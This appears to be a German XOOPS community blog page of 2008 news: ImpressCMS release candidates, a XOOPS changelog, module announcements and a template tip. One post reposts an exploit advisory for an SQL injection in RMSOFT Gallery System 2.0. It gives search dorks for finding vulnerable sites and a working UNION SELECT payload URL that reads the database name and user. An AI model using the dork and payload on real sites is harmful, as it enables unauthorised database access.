|
Hauptmenu
Sidebar Navigation
RSS Feed
|
|
|
|
|

as ImpressCMS Projekt verkündet mit Stolz die neue Version von ImpressCMS 1.0 “Janus” Release Candidate 2!
Diese Version von ImpressCMS wurde gegenüber der Release Candidate verbessert. Dieses enthält weiterhin unser Engagement für einen stabilen Weg der Migration für XOOPS Benutzer und einem einfach zu bedienenden CMS für neue Benutzer.
Bitte beachten Sie, diese Release Candidate 2 ist nicht für die Verwendung von offiziellen Webseiten geeignet. Aber wir ermutigen jeden die RC-Version zu testen! Wenn keine groben Fehler gefunden werden, gibt es ab heute in einer Woche die FINAL-VERSION!
Verbesserungen und Fehlerbehebung in der Release Candidate 2:
Added : New smarty variable now available, < {$icmsLang}> representing the selected language. For example, if French is the current language selected by the user, then the value of this variable will be “french”. (malanciault/davidl2)
Fixed : Revision 955: Display issues with impresstheme. (Snow)
Fixed : #1891588: Timezone offset empty (compatibility issue with versions of PHP aswell as operating system when using floats. (changed to an integer value instead). (vaughan
Fixed : #1892430: Typo in language/english/user.php (malanciault/jegelstaff)
Download der Vollversion und des Upgrades-Pakets gibt es hier in deutscher Sprache.

Nach dem RC haben die XOOPS Entwickler nun die Version 2.0.18.1 veröffentlicht. Sie behebt eine Reihe von kleinen Fehlern sowie ein URL-redirect Problem.
Änderungen (Changelog):
============================ 2008/02/16: Version 2.0.18.1 ============================ - Fixed #1854203 : XoopsTree::getNicePathFromId Add separator only if necessary (dugris) - Fixed #1854392 : Add missing index.html files (edomch/dugris) - Fixed bug #1847253 : Display the website url in profil (dugris) - Fixed bug #1867242 : HTML was sanitized improperly (phppp/mcdonald3072) - Fixed bugs in theme zetagenesis css files (kris_fr/phppp/mowaffak) - Fixed bug #1867843: can’t login to banner page (phppp/mowaffak) - Fixed bug #1880146: javascript variables are declared without “var” (phppp/cpks) - Fixed bug #1881197: Function does not always return a value (phppp/cpks) - Fixed bug #1881236: URL Redirection phishing (phppp/dsec.ru) - Fixed bug #1881236: local file inclusion (phppp/dsec.ru) - Fixed bug #1890044: redirect page is not well handled upon failure of avatar upload (phppp)
- Improved: cosmetic update for administration (dugris) - Improved: use xoops_error to display the error, in upload avatar (dugris) - Improved: Show the error message for uploads ranks (dugris) - Improved: Xoops Installer, xhtml/css compliance (julionc) - Improved: Turned enableRegenerateId off in XOOPS session to avoid problems with IEs (phppp) - Improved: formulating smiley display (phppp/skinnali/mowaffak) - Improved: fixed assigned by reference warnings (phppp/marco/blackrx)

ImpressCMS nimmt Form und Stabilität an Soeben wurde der Release Candidate für die Version 1.0 veröffentlicht. Diese Version von ImpressCMS wurde gegenüber der BETA2 verbessert. Dieses enthält weiterhin unser Engagement für einen stabilen Weg der Migration für XOOPS Benutzer und einem einfach zu bedienenden CMS für neue Benutzer.
Bitte beachten Sie, diese Release Candidate ist nicht für die Verwendung von offiziellen Webseiten geeignet. Aber wir ermutigen jeden die RC-Version zu testen! Eine Final-Version könnte schon kommende Woche folgen.
Verbesserungen und Fehlerbehebung der RC
Fixing a related to a query when inserting a user
Enthalten in diesem ersten Release
Neues Administrations-Interface
Integrierte Multilanguage-Fähigkeit
Neue Positionen für benutzerdefinierten Block
Verbesserter Installationsassistent welcher automatisch einen TRUST_PATH anlegt
Neue Standard-Themen und gültige xHTML Templates
Und eine MENGE mehr! Weitere Infos gibt es in der Changelog bei ImpressCMS.org
Download der Vollversion und des Upgrades-Pakets gibt es hier in deutscher Sprache.

Es ist geschafft. Das Modul OpenID wurde in der Version 0.2 veröffentlicht. Es wurde hierzu die PHP Library ‘php-openid-2.0.0′ benutzt. Das Modul steht unter der GPL und kann auf der Autorenwebseite geladen werden. Die Installation ist nicht für Einsteiger geeignet, wenn man aber Zeit und Motivation mit bringt, dann geht es schon:
INSTALLATION: - Datei entpacken - vorgesehene Daten in das Modulverzeichnis und TRUST_PATH kopieren - das Verzeichnis ‘_php_consumer’ benötigt Schreibrechte (chmod777) - jetzt das Modul normal installieren (Xoopscube, nicht vergessen die Blöcke zu installieren) - Gäste benötigen Zugriff auf das Modul (Gruppenberechtigung)
Download + Test: http://www.sakimura.org

Eine neue Version des Modules “social-bookmarks” wurde fertig gestellt. Das Modul wurde erfolgreich auf allen Systemen getestet: ImpressCMS, Simple-Xoops, Xoops und Xoops-Cube! Eine Hilfe zum Modul befindet sich direkt im Modul (zu sehen nach der Installation)! Hier wurde ein neues, wichtiges Feature hinzugefügt, die einzelnen Bookmarks können nun über die Moduleinstellungen auf aktiv oder inaktiv gesetzt werden.
Changelog - automatische Versionsanzeige im Modul-Backend (sato-san) - Block-Template geändert, damit der Webmaster das Design bestimmen kann (sato-san) - index-Template entfernt, wurde nicht genutzt (sato-san) - Optionen für Einstellungen (Muki) - Optionen fertig gestellt (Alfred) - URL für Icons angepasst (Alfred) - Mr.Wong Icon wurde angepasst, da neues Logo (sato-san) - URL für die Hilfe-Bilder im Backend angepasst (sato-san) - unbenutzte Dateien aufgeräumt (sato-san)
Download Das neue Modul “social-bookmarks 0.3″ kann über Sourceforge.net geladen werden.
Danke Mein besonderen Dank möchte ich hier auch an Alfred und Muki aussprechen, ohne die beiden wäre es nicht zu diesem Modul gekommen!


| Details : ExploitAlert |
|
Topic : RMSOFT Gallery System 2.0 (images.php id) SQL Injection Vulnerability
ExploitAlert : 3336
Credit : you_kn0w
Date : 5.2.2008
Download
 Exploit Code :
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=# # ~Author: you_kn0w # # ~Contact: you-know[at]linuxmail.org # # ~Website: www.youknowz.info # # ~Script: RRMSOFT Gallery # # ~Bug: RRMSOFT Gallery Remote SQL Injection # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # Script Information # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # # # Script name: RRMSOFT Gallery System # # Script site: http://www.xoopsmexico.net # # Script get: www.xoopsmexico.net/modules/rmdp# # Description: PHP media gallery System # # Version: 2.0 # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
# [-]Dorks: intext:Powered by RMSOFT GS 2.0 inurl:modules/rmgs/images.php
# [+]How To Exploit:
http://[target].com/[path]/modules/rmgs/images.php?q=user&id =1999/**/union/**/all/**/select/**/1,1,concat(database(),0×202D20 ,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/ *
# [+]Greetz:
Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo
//you_kn0w #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
|
Quelle:http://securityreason.com/exploitalert/3336

In meiner Webseite möchte ich eine Textbox haben und wenn ein User dort hineinklickt, dann soll der voreingestellte Text automatisch verschwinden. Damit ich das für den Block der Suche umsetzen kann, muss ich nur das Template (system_block_search.html) dazu ein bisschen bearbeiten. vorher
 nacher

Das kann mit jedem Textfeld genutzt werden.
SWF = http://www.xoops-magazine.com/uploads/wp-content/2008/02/mouse-over-text.swf

Jetzt auch bei Chip.de! Das CMS XOOPS kann nun auch über das bekannte deutsche Onlineportal geladen werden. XOOPS wird hier vorgestellt und die Redaktion befindet das CMS als sehr gut!
Zitat: Fazit: Möchten Sie größere Web-Projekte realisieren, werden Sie wohl kaum um ein CMS herumkommen. Mit XOOPS haben Sie ein leistungsfähiges Werkzeug, dieses Ziel zu erreichen.
Ich kann mir gut vorstellen, das auch ein Artikel in der Zeitschrift folgen wird. Lassen wir uns überraschen.

Xigg (version 0.1.9a2) - ein Digg.com Klone, für Deine Webseite! Binde die User in Deiner Webseite ein und nutze die neuen Funktionen. Jeder User Deiner Webseite kann für die Artikel bei Gefallen eine Stimme abgeben (Xigg it). Zu jedem Artikel können natürlich auch Kommentare geschrieben werden. Da das Modul über viele Erweiterungen (Plugin) verfügt, kann das Modul noch aufgepeppt werden.
Für die Artikel können viele Kategorien und Unterkategorien erstellt werden. Außerdem können zu jedem Artikel sogenannte Tags hinzugefügt werden. Diese Tags können in einem Block als ein Wortwolke dargestellt werden. Das Modul hat im gesamten 7 Blöck zur Darstellung. Plugins: - Prototype (für Ajax-Funktionen) - ExternalLink (kl. Icon für externe Links) - LinkBubbler (Popup für Webseitenscreenshots) - verschiedene Editoren (BB-Code, TinyMCE, Text Wiki, HTML) - Akismet (Anti-Samp) - Services_Trackback - Google Blog Search Ping
Das Modul funktioniert mit XOOPS, XOOPS Cube, ImpressCMS und simple-xoops!!
Einen kleinen Nachteile hat das Modul noch: Der TinyMCE und Prototype dürfen nicht zusammen aktiviert werden, hier gibt es noch einen Bug. Der Entwickler ist informiert und wird den Fehler beheben.
Jetzt das Modul Downloaden!
|
|